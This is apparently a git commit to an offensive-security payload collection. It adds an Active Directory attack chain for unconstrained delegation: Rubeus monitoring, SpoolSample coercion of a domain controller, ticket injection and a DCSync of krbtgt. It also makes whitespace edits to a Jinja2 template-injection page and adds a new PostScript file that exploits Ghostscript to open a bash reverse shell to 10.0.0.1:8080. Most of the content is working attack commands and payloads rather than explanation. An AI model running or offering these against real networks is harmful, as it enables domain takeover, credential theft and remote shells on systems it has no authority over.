Active Directory - Unconstrained delegation

patch-1
Swissky 2019-07-17 23:17:35 +02:00
parent 3cce80cd53
commit 45af613fd9
3 changed files with 67 additions and 8 deletions

View File

@ -11,7 +11,6 @@
* [Password in AD User comment](#password-in-ad-user-comment)
* [Golden Tickets](#passtheticket-golden-tickets)
* [Silver Tickets](#passtheticket-silver-tickets)
* [Trust Tickets](#trust-tickets)
* [Kerberoast](#kerberoast)
* [KRB_AS_REP roasting](#krb_as_rep-roasting)
* [Pass-the-Hash](#pass-the-hash)
@ -20,6 +19,8 @@
* [NTLMv2 hashes relaying](#ntlmv2-hashes-relaying)
* [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
* [Trust relationship between domains](#trust-relationship-between-domains)
* [Unconstrained delegation](#unconstrained-delegation)
* [Resource-Based Constrained Delegation](#resource-based-constrained-delegation)
* [PrivExchange attack](#privexchange-attack)
* [Password spraying](#password-spraying)
@ -443,10 +444,6 @@ export KRB5CCNAME=/home/user/ticket.ccache
./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100
```
### Trust Tickets
TODO
### Kerberoast
> "A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names)
@ -608,6 +605,60 @@ SourceName TargetName TrustType TrustDirection
domainA.local domainB.local TreeRoot Bidirectional
```
### Unconstrained delegation
#### Find delegation
Check the `TrustedForDelegation` property.
```powershell
# From https://github.com/samratashok/ADModule
PS> Get-ADComputer -Filter {TrustedForDelegation -eq $True}
or
$> ldapdomaindump -u "DOMAIN\\Account" -p "Password123*" 10.10.10.10
grep TRUSTED_FOR_DELEGATION domain_computers.grep
```
NOTE: Domain controllers usually have unconstrained delegation enabled
#### Monitor with Rubeus
Monitor incoming connections from Rubeus.
```powershell
Rubeus.exe monitor /interval:1
```
#### Force a connect back from the DC
> SpoolSample is a PoC to coerce a Windows host to authenticate to an arbitrary server using a "feature" in the MS-RPRN RPC interface
```powershell
# From https://github.com/leechristensen/SpoolSample
.\SpoolSample.exe VICTIM-DC-NAME UNCONSTRAINED-SERVER-DC-NAME
.\SpoolSample.exe DC01.HACKER.LAB HELPDESK.HACKER.LAB
# DC01.HACKER.LAB is the domain controller we want to compromise
# HELPDESK.HACKER.LAB is the machine with delegation enabled that we control.
```
If the attack worked you should get a TGT of the domain controller.
#### Load the ticket
Extract the base64 TGT from Rubeus output and load it to our current session.
```powershell
.\Rubeus.exe asktgs /ticket:<ticket base64> /ptt
```
Then you can use DCsync or another attack : `Mimikatz> lsadump::dcsync /user:HACKER\krbtgt`
### Resource-Based Constrained Delegation
TODO
### PrivExchange attack
Exchange your privileges for Domain Admin privs by abusing Exchange.
@ -711,4 +762,6 @@ Most of the time the best passwords to spray are :
* [Chump2Trump - AD Privesc talk at WAHCKon 2017 - @l0ss](https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf)
* [Post-OSCP Series Part 2 - Kerberoasting - 16 APRIL 2019 - Jon Hickman](https://0metasecurity.com/post-oscp-part-2/)
* [WHATS SPECIAL ABOUT THE BUILTIN ADMINISTRATOR ACCOUNT? - 21/05/2012 - MORGAN SIMONSEN](https://morgansimonsen.com/2012/05/21/whats-special-about-the-builtin-administrator-account-12/)
* [Exploiting MS14-068 with PyKEK and Kali - 14 DEC 2014 - ZACH GRACE @ztgrace](https://zachgrace.com/posts/exploiting-ms14-068/)
* [Exploiting MS14-068 with PyKEK and Kali - 14 DEC 2014 - ZACH GRACE @ztgrace](https://zachgrace.com/posts/exploiting-ms14-068/)
* [Hunting in Active Directory: Unconstrained Delegation & Forests Trusts - Roberto Rodriguez - Nov 28, 2018](https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1)
* [Exploiting Unconstrained Delegation - Riccardo Ancarani - 28 APRIL 2019](https://www.riccardoancarani.it/exploiting-unconstrained-delegation/)

View File

@ -188,9 +188,9 @@ ${x}
## Jinja2
[Official website](http://jinja.pocoo.org/)
> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
### Basic injection
### Basic injection
```python
{{4*4}}[[5*5]]

View File

@ -0,0 +1,6 @@
%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1') currentdevice putdeviceprops